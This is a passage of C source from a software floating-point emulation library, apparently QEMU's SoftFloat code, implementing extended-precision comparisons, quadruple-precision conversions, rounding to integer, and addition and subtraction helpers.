                  && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) )
           );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| less than or equal to the corresponding value `b', and 0 otherwise. The
| invalid exception is raised if either operand is a NaN. The comparison is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_le( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, bSign;

    /* Signaling comparison: any NaN or invalid encoding raises invalid. */
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise( float_flag_invalid STATUS_VAR);
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        /* Different signs: a <= b iff a is the negative one, or both are
           zeros (+0 <= -0 must hold). */
        return
               aSign
            || (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 == 0 );
    }
    /* Same sign: magnitude comparison of the raw bits, reversed when both
       are negative. */
    return
          aSign ? le128( b.high, b.low, a.high, a.low )
        : le128( a.high, a.low, b.high, b.low );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| less than the corresponding value `b', and 0 otherwise. The invalid
| exception is raised if either operand is a NaN. The comparison is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_lt( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise( float_flag_invalid STATUS_VAR);
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        /* Different signs: a < b iff a is negative and not both zero. */
        return
               aSign
            && (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 != 0 );
    }
    return
          aSign ? lt128( b.high, b.low, a.high, a.low )
        : lt128( a.high, a.low, b.high, b.low );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point values `a' and `b'
| cannot be compared, and 0 otherwise. The invalid exception is raised if
| either operand is a NaN. The comparison is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/
int floatx80_unordered( floatx80 a, floatx80 b STATUS_PARAM )
{
    /* Unordered iff either operand is any NaN or an invalid encoding;
       this signaling variant always raises invalid in that case. */
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise( float_flag_invalid STATUS_VAR);
        return 1;
    }
    return 0;
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not
| cause an exception. The comparison is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_eq_quiet( floatx80 a, floatx80 b STATUS_PARAM )
{

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return 0;
    }
    /* Quiet comparison: NaNs compare unequal, but only signaling NaNs
       raise the invalid exception. */
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (    floatx80_is_signaling_nan( a )
             || floatx80_is_signaling_nan( b ) ) {
            float_raise( float_flag_invalid STATUS_VAR);
        }
        return 0;
    }
    /* Bit-equal, or both zeros regardless of sign. */
    return
           ( a.low == b.low )
        && (    ( a.high == b.high )
             || (    ( a.low == 0 )
                  && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) )
           );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is less
| than or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs
| do not cause an exception. Otherwise, the comparison is performed according
| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_le_quiet( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return 0;
    }
    /* Quiet: only signaling NaNs raise invalid. */
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (    floatx80_is_signaling_nan( a )
             || floatx80_is_signaling_nan( b ) ) {
            float_raise( float_flag_invalid STATUS_VAR);
        }
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        /* Different signs: true if a is negative, or both are zeros. */
        return
               aSign
            || (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 == 0 );
    }
    return
          aSign ? le128( b.high, b.low, a.high, a.low )
        : le128( a.high, a.low, b.high, b.low );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is less
| than the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause
| an exception. Otherwise, the comparison is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_lt_quiet( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return 0;
    }
    /* Quiet: only signaling NaNs raise invalid. */
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (    floatx80_is_signaling_nan( a )
             || floatx80_is_signaling_nan( b ) ) {
            float_raise( float_flag_invalid STATUS_VAR);
        }
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        /* Different signs: true iff a is negative and not both zero. */
        return
               aSign
            && (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 != 0 );
    }
    return
          aSign ? lt128( b.high, b.low, a.high, a.low )
        : lt128( a.high, a.low, b.high, b.low );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point values `a' and `b'
| cannot be compared, and 0 otherwise. Quiet NaNs do not cause an exception.
| The comparison is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/
int floatx80_unordered_quiet( floatx80 a, floatx80 b STATUS_PARAM )
{
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return 1;
    }
    /* Unordered iff either operand is a NaN; only signaling NaNs raise. */
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (    floatx80_is_signaling_nan( a )
             || floatx80_is_signaling_nan( b ) ) {
            float_raise( float_flag_invalid STATUS_VAR);
        }
        return 1;
    }
    return 0;
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit two's complement integer format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode. If `a' is a NaN, the largest
| positive integer is returned. Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int32 float128_to_int32( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp, shiftCount;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    /* NaNs are forced positive so overflow handling returns INT32_MAX. */
    if ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) aSign = 0;
    if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 );
    /* Collapse the low fraction word into a sticky bit. */
    aSig0 |= ( aSig1 != 0 );
    shiftCount = 0x4028 - aExp;
    if ( 0 < shiftCount ) shift64RightJamming( aSig0, shiftCount, &aSig0 );
    return roundAndPackInt32( aSign, aSig0 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit two's complement integer format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero. If
| `a' is a NaN, the largest positive integer is returned. Otherwise, if the
| conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int32 float128_to_int32_round_to_zero( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp, shiftCount;
    uint64_t aSig0, aSig1, savedASig;
    int32_t z;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    aSig0 |= ( aSig1 != 0 );
    /* Exponents above 0x401E cannot fit in 32 bits (NaN forced positive). */
    if ( 0x401E < aExp ) {
        if ( ( aExp == 0x7FFF ) && aSig0 ) aSign = 0;
        goto invalid;
    }
    else if ( aExp < 0x3FFF ) {
        /* |a| < 1 truncates to 0; non-zero values are inexact. */
        if ( aExp || aSig0 ) STATUS(float_exception_flags) |= float_flag_inexact;
        return 0;
    }
    aSig0 |= LIT64( 0x0001000000000000 );
    shiftCount = 0x402F - aExp;
    savedASig = aSig0;
    aSig0 >>= shiftCount;
    z = (int32_t)aSig0;
    if ( aSign ) z = - z;
    /* Sign mismatch after negation indicates overflow of int32. */
    if ( ( z < 0 ) ^ aSign ) {
 invalid:
        float_raise( float_flag_invalid STATUS_VAR);
        return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF;
    }
    if ( ( aSig0<<shiftCount ) != savedASig ) {
        STATUS(float_exception_flags) |= float_flag_inexact;
    }
    return z;

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 64-bit two's complement integer format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode. If `a' is a NaN, the largest
| positive integer is returned. Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int64 float128_to_int64( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp, shiftCount;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 );
    shiftCount = 0x402F - aExp;
    if ( shiftCount <= 0 ) {
        /* Magnitude at or beyond 2^63: saturate (NaN -> INT64_MAX,
           -2^63 exactly is representable). */
        if ( 0x403E < aExp ) {
            float_raise( float_flag_invalid STATUS_VAR);
            if (    ! aSign
                 || (    ( aExp == 0x7FFF )
                      && ( aSig1 || ( aSig0 != LIT64( 0x0001000000000000 ) ) )
                    )
               ) {
                return LIT64( 0x7FFFFFFFFFFFFFFF );
            }
            return (int64_t) LIT64( 0x8000000000000000 );
        }
        shortShift128Left( aSig0, aSig1, - shiftCount, &aSig0, &aSig1 );
    }
    else {
        shift64ExtraRightJamming( aSig0, aSig1, shiftCount, &aSig0, &aSig1 );
    }
    return roundAndPackInt64( aSign, aSig0, aSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 64-bit two's complement integer format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned. Otherwise, if
| the conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int64 float128_to_int64_round_to_zero( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp, shiftCount;
    uint64_t aSig0, aSig1;
    int64 z;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 );
    shiftCount = aExp - 0x402F;
    if ( 0 < shiftCount ) {
        if ( 0x403E <= aExp ) {
            aSig0 &= LIT64( 0x0000FFFFFFFFFFFF );
            /* Exactly -2^63 (possibly with truncated fraction bits) is the
               one magnitude-2^63 value that fits. */
            if (    ( a.high == LIT64( 0xC03E000000000000 ) )
                 && ( aSig1 < LIT64( 0x0002000000000000 ) ) ) {
                if ( aSig1 ) STATUS(float_exception_flags) |= float_flag_inexact;
            }
            else {
                float_raise( float_flag_invalid STATUS_VAR);
                if ( ! aSign || ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) ) {
                    return LIT64( 0x7FFFFFFFFFFFFFFF );
                }
            }
            return (int64_t) LIT64( 0x8000000000000000 );
        }
        z = ( aSig0<<shiftCount ) | ( aSig1>>( ( - shiftCount ) & 63 ) );
        if ( (uint64_t) ( aSig1<<shiftCount ) ) {
            STATUS(float_exception_flags) |= float_flag_inexact;
        }
    }
    else {
        if ( aExp < 0x3FFF ) {
            /* |a| < 1 truncates to 0. */
            if ( aExp | aSig0 | aSig1 ) {
                STATUS(float_exception_flags) |= float_flag_inexact;
            }
            return 0;
        }
        z = aSig0>>( - shiftCount );
        if (    aSig1
             || ( shiftCount && (uint64_t) ( aSig0<<( shiftCount & 63 ) ) ) ) {
            STATUS(float_exception_flags) |= float_flag_inexact;
        }
    }
    if ( aSign ) z = - z;
    return z;

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the single-precision floating-point format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

float32 float128_to_float32( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp;
    uint64_t aSig0, aSig1;
    uint32_t zSig;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloat32( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR );
        }
        return packFloat32( aSign, 0xFF, 0 );
    }
    /* Low fraction word becomes a sticky bit, then narrow with jamming. */
    aSig0 |= ( aSig1 != 0 );
    shift64RightJamming( aSig0, 18, &aSig0 );
    zSig = (uint32_t)aSig0;
    if ( aExp || zSig ) {
        zSig |= 0x40000000;
        aExp -= 0x3F81;
    }
    return roundAndPackFloat32( aSign, aExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the double-precision floating-point format. The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

float64 float128_to_float64( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloat64( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR );
        }
        return packFloat64( aSign, 0x7FF, 0 );
    }
    /* Align the 112-bit fraction, fold the remainder into a sticky bit. */
    shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 );
    aSig0 |= ( aSig1 != 0 );
    if ( aExp || aSig0 ) {
        aSig0 |= LIT64( 0x4000000000000000 );
        aExp -= 0x3C01;
    }
    return roundAndPackFloat64( aSign, aExp, aSig0 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the extended double-precision floating-point format. The
| conversion is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 float128_to_floatx80( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloatx80( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR );
        }
        return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) );
    }
    if ( aExp == 0 ) {
        if ( ( aSig0 | aSig1 ) == 0 ) return packFloatx80( aSign, 0, 0 );
        normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 );
    }
    else {
        /* Make the integer bit explicit for the 80-bit format. */
        aSig0 |= LIT64( 0x0001000000000000 );
    }
    shortShift128Left( aSig0, aSig1, 15, &aSig0, &aSig1 );
    return roundAndPackFloatx80( 80, aSign, aExp, aSig0, aSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Rounds the quadruple-precision floating-point value `a' to an integer, and
| returns the result as a quadruple-precision floating-point value. The
| operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_round_to_int( float128 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp;
    uint64_t lastBitMask, roundBitsMask;
    float128 z;

    aExp = extractFloat128Exp( a );
    if ( 0x402F <= aExp ) {
        /* Fraction bit of weight 1 lies in the LOW word (or a is already
           integral / Inf / NaN for very large exponents). */
        if ( 0x406F <= aExp ) {
            if (    ( aExp == 0x7FFF )
                 && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) )
               ) {
                return propagateFloat128NaN( a, a STATUS_VAR );
            }
            return a;
        }
        /* lastBitMask is the integer ULP within z.low; it is 0 when the
           ULP is exactly bit 64 (carry handled via z.high). */
        lastBitMask = 1;
        lastBitMask = ( lastBitMask<<( 0x406E - aExp ) )<<1;
        roundBitsMask = lastBitMask - 1;
        z = a;
        switch (STATUS(float_rounding_mode)) {
        case float_round_nearest_even:
            if ( lastBitMask ) {
                add128( z.high, z.low, 0, lastBitMask>>1, &z.high, &z.low );
                /* Exactly halfway: clear the ULP to round to even. */
                if ( ( z.low & roundBitsMask ) == 0 ) z.low &= ~ lastBitMask;
            }
            else {
                if ( (int64_t) z.low < 0 ) {
                    ++z.high;
                    if ( (uint64_t) ( z.low<<1 ) == 0 ) z.high &= ~1;
                }
            }
            break;
        case float_round_ties_away:
            if (lastBitMask) {
                add128(z.high, z.low, 0, lastBitMask >> 1, &z.high, &z.low);
            } else {
                if ((int64_t) z.low < 0) {
                    ++z.high;
                }
            }
            break;
        case float_round_to_zero:
            break;
        case float_round_up:
            if (!extractFloat128Sign(z)) {
                add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low);
            }
            break;
        case float_round_down:
            if (extractFloat128Sign(z)) {
                add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low);
            }
            break;
        default:
            float_raise(float_flag_invalid STATUS_VAR);
            break;
        }
        z.low &= ~ roundBitsMask;
    }
    else {
        if ( aExp < 0x3FFF ) {
            /* |a| < 1: result is 0 or +/-1 depending on the rounding mode. */
            if ( ( ( (uint64_t) ( a.high<<1 ) ) | a.low ) == 0 ) return a;
            STATUS(float_exception_flags) |= float_flag_inexact;
            aSign = extractFloat128Sign( a );
            switch ( STATUS(float_rounding_mode) ) {
             case float_round_nearest_even:
                if (    ( aExp == 0x3FFE )
                     && (   extractFloat128Frac0( a )
                          | extractFloat128Frac1( a ) )
                   ) {
                    return packFloat128( aSign, 0x3FFF, 0, 0 );
                }
                break;
            case float_round_ties_away:
                if (aExp == 0x3FFE) {
                    return packFloat128(aSign, 0x3FFF, 0, 0);
                }
                break;
             case float_round_down:
                return
                      aSign ? packFloat128( 1, 0x3FFF, 0, 0 )
                    : packFloat128( 0, 0, 0, 0 );
             case float_round_up:
                return
                      aSign ? packFloat128( 1, 0, 0, 0 )
                    : packFloat128( 0, 0x3FFF, 0, 0 );
            }
            return packFloat128( aSign, 0, 0, 0 );
        }
        /* The integer ULP lies in the HIGH word; the whole low word is
           fraction and is discarded (folded in as a sticky via a.low). */
        lastBitMask = 1;
        lastBitMask <<= 0x402F - aExp;
        roundBitsMask = lastBitMask - 1;
        z.low = 0;
        z.high = a.high;
        switch (STATUS(float_rounding_mode)) {
        case float_round_nearest_even:
            z.high += lastBitMask>>1;
            if ( ( ( z.high & roundBitsMask ) | a.low ) == 0 ) {
                z.high &= ~ lastBitMask;
            }
            break;
        case float_round_ties_away:
            z.high += lastBitMask>>1;
            break;
        case float_round_to_zero:
            break;
        case float_round_up:
            if (!extractFloat128Sign(z)) {
                z.high |= ( a.low != 0 );
                z.high += roundBitsMask;
            }
            break;
        case float_round_down:
            if (extractFloat128Sign(z)) {
                z.high |= (a.low != 0);
                z.high += roundBitsMask;
            }
            break;
        default:
            float_raise(float_flag_invalid STATUS_VAR);
            break;
        }
        z.high &= ~ roundBitsMask;
    }
    if ( ( z.low != a.low ) || ( z.high != a.high ) ) {
        STATUS(float_exception_flags) |= float_flag_inexact;
    }
    return z;

}

/*----------------------------------------------------------------------------
| Returns the result of adding the absolute values of the quadruple-precision
| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated
| before being returned. `zSign' is ignored if the result is a NaN.
| The addition is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float128 addFloat128Sigs( float128 a, float128 b, flag zSign STATUS_PARAM)
{
    int32 aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2;
    int32 expDiff;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    expDiff = aExp - bExp;
    if ( 0 < expDiff ) {
        /* Align b to a; zSig2 collects the bits shifted out (round/sticky). */
        if ( aExp == 0x7FFF ) {
            if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR );
            return a;
        }
        if ( bExp == 0 ) {
            --expDiff;   /* subnormal: no implicit integer bit to add */
        }
        else {
            bSig0 |= LIT64( 0x0001000000000000 );
        }
        shift128ExtraRightJamming(
            bSig0, bSig1, 0, expDiff, &bSig0, &bSig1, &zSig2 );
        zExp = aExp;
    }
    else if ( expDiff < 0 ) {
        /* Mirror case: align a to b. */
        if ( bExp == 0x7FFF ) {
            if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR );
            return packFloat128( zSign, 0x7FFF, 0, 0 );
        }
        if ( aExp == 0 ) {
            ++expDiff;
        }
        else {
            aSig0 |= LIT64( 0x0001000000000000 );
        }
        shift128ExtraRightJamming(
            aSig0, aSig1, 0, - expDiff, &aSig0, &aSig1, &zSig2 );
        zExp = bExp;
    }
    else {
        /* Equal exponents: no alignment shift needed. */
        if ( aExp == 0x7FFF ) {
            if ( aSig0 | aSig1 | bSig0 | bSig1 ) {
                return propagateFloat128NaN( a, b STATUS_VAR );
            }
            return a;
        }
        add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
        if ( aExp == 0 ) {
            /* Both subnormal (or zero): result needs no rounding. */
            if (STATUS(flush_to_zero)) {
                if (zSig0 | zSig1) {
                    float_raise(float_flag_output_denormal STATUS_VAR);
                }
                return packFloat128(zSign, 0, 0, 0);
            }
            return packFloat128( zSign, 0, zSig0, zSig1 );
        }
        zSig2 = 0;
        zSig0 |= LIT64( 0x0002000000000000 );
        zExp = aExp;
        goto shiftRight1;
    }
    aSig0 |= LIT64( 0x0001000000000000 );
    add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
    --zExp;
    if ( zSig0 < LIT64( 0x0002000000000000 ) ) goto roundAndPack;
    ++zExp;
 shiftRight1:
    /* Significand overflowed one bit: renormalize, jamming into zSig2. */
    shift128ExtraRightJamming(
        zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 );
 roundAndPack:
    return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of subtracting the absolute values of the quadruple-
| precision floating-point values `a' and `b'. If `zSign' is 1, the
| difference is negated before being returned. `zSign' is ignored if the
| result is a NaN. The subtraction is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float128 subFloat128Sigs( float128 a, float128 b, flag zSign STATUS_PARAM)
{
    int32 aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1;
    int32 expDiff;
    float128 z;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    expDiff = aExp - bExp;
    /* Pre-shift both significands left 14 for extra working precision;
       compensated by `zExp - 14' at the final normalize/pack below. */
    shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 );
    shortShift128Left( bSig0, bSig1, 14, &bSig0, &bSig1 );
    if ( 0 < expDiff ) goto aExpBigger;
    if ( expDiff < 0 ) goto bExpBigger;
    /* Equal exponents: Inf - Inf is invalid; otherwise compare magnitudes
       to decide the sign of the exact difference. */
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 | bSig0 | bSig1 ) {
            return propagateFloat128NaN( a, b STATUS_VAR );
        }
        float_raise( float_flag_invalid STATUS_VAR);
        z.low = float128_default_nan_low;
        z.high = float128_default_nan_high;
        return z;
    }
    if ( aExp == 0 ) {
        aExp = 1;
        bExp = 1;
    }
    if ( bSig0 < aSig0 ) goto aBigger;
    if ( aSig0 < bSig0 ) goto bBigger;
    if ( bSig1 < aSig1 ) goto aBigger;
    if ( aSig1 < bSig1 ) goto bBigger;
    /* Exact zero result: sign depends on the rounding direction. */
    return packFloat128( STATUS(float_rounding_mode) == float_round_down, 0, 0, 0 );
 bExpBigger:
    if ( bExp == 0x7FFF ) {
        if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR );
        return packFloat128( zSign ^ 1, 0x7FFF, 0, 0 );
    }
    if ( aExp == 0 ) {
        ++expDiff;
    }
    else {
        aSig0 |= LIT64( 0x4000000000000000 );
    }
    shift128RightJamming( aSig0, aSig1, - expDiff, &aSig0, &aSig1 );
    bSig0 |= LIT64( 0x4000000000000000 );
 bBigger:
    sub128( bSig0, bSig1, aSig0, aSig1, &zSig0, &zSig1 );
    zExp = bExp;
    zSign ^= 1;
    goto normalizeRoundAndPack;
 aExpBigger:
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR );
        return a;
    }
    if ( bExp == 0 ) {
        --expDiff;
    }
    else {
        bSig0 |= LIT64( 0x4000000000000000 );
    }
    shift128RightJamming( bSig0, bSig1, expDiff, &bSig0, &bSig1 );
    aSig0 |= LIT64( 0x4000000000000000 );
 aBigger:
    sub128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
    zExp = aExp;
 normalizeRoundAndPack:
    --zExp;
    return normalizeRoundAndPackFloat128( zSign, zExp - 14, zSig0, zSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of adding the quadruple-precision floating-point values
| `a' and `b'. The operation is performed according to the IEC/IEEE Standard
| for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_add( float128 a, float128 b STATUS_PARAM )
{
    flag aSign, bSign;

    aSign = extractFloat128Sign( a );
    bSign = extractFloat128Sign( b );
    /* Same sign: magnitudes add; opposite signs: magnitudes subtract. */
    if ( aSign == bSign ) {
        return addFloat128Sigs( a, b, aSign STATUS_VAR );
    }
    else {
        return subFloat128Sigs( a, b, aSign STATUS_VAR );
    }

}

/*----------------------------------------------------------------------------
| Returns the result of subtracting the quadruple-precision floating-point
| values `a' and `b'. The operation is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
